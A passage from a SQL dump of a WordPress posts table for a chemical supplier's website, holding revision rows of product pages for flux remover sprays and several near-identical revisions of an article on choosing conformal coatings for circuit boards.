'https://www.miller-stephenson.com/1695-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4000, 2, '2017-04-10 04:22:20', '2017-04-10 04:22:20', '<h3><strong>Miller-Stephenson Flux Removers</strong></h3>\nStrong flux removers, cleaning agent containing a Hydrofluoroether azeotrope, ideally suited for removal of rosin, organic flux, oils, grease and waxes. They also can be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications.\n\nAdvantages of Miller-Stephenson Flux Removers:\n<ul>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Non ozone-depleting</li>\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\n</ul>\n&nbsp;\n\n&nbsp;\n\n&nbsp;', 'MS-725/727 Flux Removers', '<p><strong>Removes Organic Flux, Heavy Oils, Greases and Wax</strong></p><p>A strong, cleaning agent containing a hydrofluoroether azeotrope, ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can also be used for precision and specialty cleaning. When used in bulk form, low surface tension, and constant composition during boiling make this product highly suitable for immersion and vapor degreasing equipment. No ODC (ozone depleting chemicals).</p>', 'inherit', 'closed', 'closed', '', '1697-autosave-v1', '', '', '2017-04-10 04:22:20', '2017-04-10 04:22:20', '', 1697, 'https://www.miller-stephenson.com/1697-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4001, 0, '2017-04-10 05:57:14', '2017-04-10 05:57:14', '', '', '', 'publish', 'closed', 'closed', '', '4001', '', '', '2017-04-10 05:57:14', '2017-04-10 05:57:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4001/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4002, 0, '2017-04-10 06:36:32', '2017-04-10 06:36:32', '', '', '', 'publish', 'closed', 'closed', '', '4002', '', '', '2017-04-10 06:36:32', '2017-04-10 06:36:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4002/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4003, 0, '2017-04-10 06:54:36', '2017-04-10 06:54:36', '', '', '', 'publish', 'closed', 'closed', '', '4003', '', '', '2017-04-10 06:54:36', '2017-04-10 06:54:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4003/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4004, 0, '2017-04-10 08:45:45', '2017-04-10 08:45:45', '', '', '', 'publish', 'closed', 'closed', '', '4004', '', '', '2017-04-10 08:45:46', '2017-04-10 08:45:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4004/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4005, 2, '2017-04-10 13:04:59', '2017-04-10 13:04:59', '<h3>Flux Remover Spray Information</h3>\nA strong nonflammable flux remover spray containing a blend of hydrofluoroethers with trans-1, 2 dichloroethylene and isopropyl alcohol. This mixture is a blend of azeotropes. Ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can also be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. H0805B can be used in a vapor degreaser. It replaces nPB and HCFC-225 in many applications.\n<h4><strong>Advantages of Miller-Stephenson Flux Remover Spray: </strong></h4>\n<ul>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Nonflammable</li>\n 	<li>Non ozone depleting</li>\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\n</ul>\n<strong>Properties of Solvent:</strong>\n\nBoiling Point.....................................................113°F/45°C\n\nVapor Pressure.................................................360 mm Hg\n\nLiquid Density...............................1.27 g/ml @ 70°F/21°C\n\nOzone Depletion...........................................................0.00\n\nGlobal Warming Potential, H0805A............................35.6\n\nH0805B............................43.0\n\n<strong>PLASTIC COMPATIBILITY:</strong>\n\n(Immersion: 15 minutes at Room Temperature)\n<ul>\n 	<li>Acetal</li>\n 	<li>Polyethylene</li>\n 	<li>Polypropylene</li>\n 	<li>Liquid Crystal Polymer</li>\n 	<li>Polyester, PBT, PET</li>\n 	<li>Epoxy</li>\n 	<li>Polysulfone, PSO</li>\n 	<li>PEK, PEEK</li>\n 	<li>Polyimides</li>\n 	<li>PTFE</li>\n 	<li>Phenolic</li>\n 	<li>Polyvinylchloride</li>\n</ul>\nNOTE: Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\n\n<strong>ELASTOMER COMPATIBILITY:</strong>\n\n(Immersion: 15 mins at Room Temperature)\n<ul>\n 	<li>Butyl Rubber*</li>\n 	<li>Natural Rubber</li>\n 	<li>Polysulfide</li>\n 	<li>EPDM</li>\n 	<li>Buna S*</li>\n 	<li>Buna N</li>\n 	<li>Neoprene*</li>\n 	<li>Urethane</li>\n 	<li>Chlorosuflonated PE</li>\n 	<li>Silicone</li>\n 	<li>Fluoroelastomers</li>\n</ul>\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\n\n<strong>METAL COMPATIBILITY: </strong>\n\n(Immersion: 2 weeks at 248°F/120°C)\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Iron</li>\n</ul>\nNote: Test for compatibility before use.\n\nThis product is nonflammable, odorless, and has a low order of toxicity.\n\nSafety Data Sheets (SDS) are available upon request.\n\nFor technical support: 800-992-2424 (8-4 E.T.) in the U.S.\n\n800-323-4621 (8-4 E.T.) in Canada.\n\nE-mail: : support@mschem.com', 'H0805A & H0B05B Flux Remover Spray', '<strong>Removes Organic Flux, Oils, Grease and Wax</strong>\n\nA strong, nonflammable cleaning agent containing an azeotrope blend of hydrofluoroethers with trans-1,2-dichloroethylene and isopropyl alcohol. It is ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can be used for precision and specialty cleaning. Recommended for use in vapor degreasing equipment. Evaporates quickly and leaves no residue. Low GWP (global warming potential). No ODC (ozone depleting chemicals).', 'inherit', 'closed', 'closed', '', '1693-autosave-v1', '', '', '2017-04-10 13:04:59', '2017-04-10 13:04:59', '', 1693, 'https://www.miller-stephenson.com/1693-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4006, 0, '2017-04-10 14:23:15', '2017-04-10 14:23:15', '', '', '', 'publish', 'closed', 'closed', '', '4006', '', '', '2017-04-10 14:23:15', '2017-04-10 14:23:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/4006/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4007, 0, '2017-04-10 14:27:29', '2017-04-10 14:27:29', '', '', '', 'publish', 'closed', 'closed', '', '4007', '', '', '2017-04-10 14:27:29', '2017-04-10 14:27:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4007/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4008, 0, '2017-04-10 17:32:22', '2017-04-10 17:32:22', '', '', '', 'publish', 'closed', 'closed', '', '4008', '', '', '2017-04-10 17:32:23', '2017-04-10 17:32:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/4008/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4009, 2, '2017-04-10 17:59:32', '2017-04-10 17:59:32', '<h3>Conformal Coatings | Which Conformal Coatings are right for you?</h3>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nOur entire line of conformal coatings can be found <a href="https://www.miller-stephenson.com/chemicals/conformal-coating/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-04-10 17:59:32', '2017-04-10 17:59:32', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4010, 2, '2017-04-10 18:10:40', '2017-04-10 18:10:40', '<h3>Conformal Coatings | Which Conformal Coatings are right for you?</h3>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h4><strong>Types of Conformal Coatings:</strong></h4>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h4><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h4>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nOur entire line of conformal coatings can be found <a href="https://www.miller-stephenson.com/chemicals/conformal-coating/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-04-10 18:10:40', '2017-04-10 18:10:40', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4011, 2, '2017-04-10 18:15:17', '2017-04-10 18:15:17', '<h3>Conformal Coatings | Which Conformal Coatings are right for you?</h3>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h4><strong>Types of Conformal Coatings:</strong></h4>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h4><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h4>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nOur entire line of conformal coatings can be found <a href="https://www.miller-stephenson.com/chemicals/conformal-coating/">here.</a>\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-04-10 18:15:17', '2017-04-10 18:15:17', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4012, 2, '2017-04-10 18:16:51', '2017-04-10 18:16:51', '<h3>Conformal Coatings | Which Conformal Coatings are right for you?</h3>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h4><strong>Types of Conformal Coatings:</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h4><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h4>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-04-10 18:16:51', '2017-04-10 18:16:51', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4013, 2, '2017-04-10 18:20:03', '2017-04-10 18:20:03', '<h3>Conformal Coatings | Which Conformal Coatings are right for you?</h3>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings : Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h4><strong>Types of Conformal Coatings:</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of 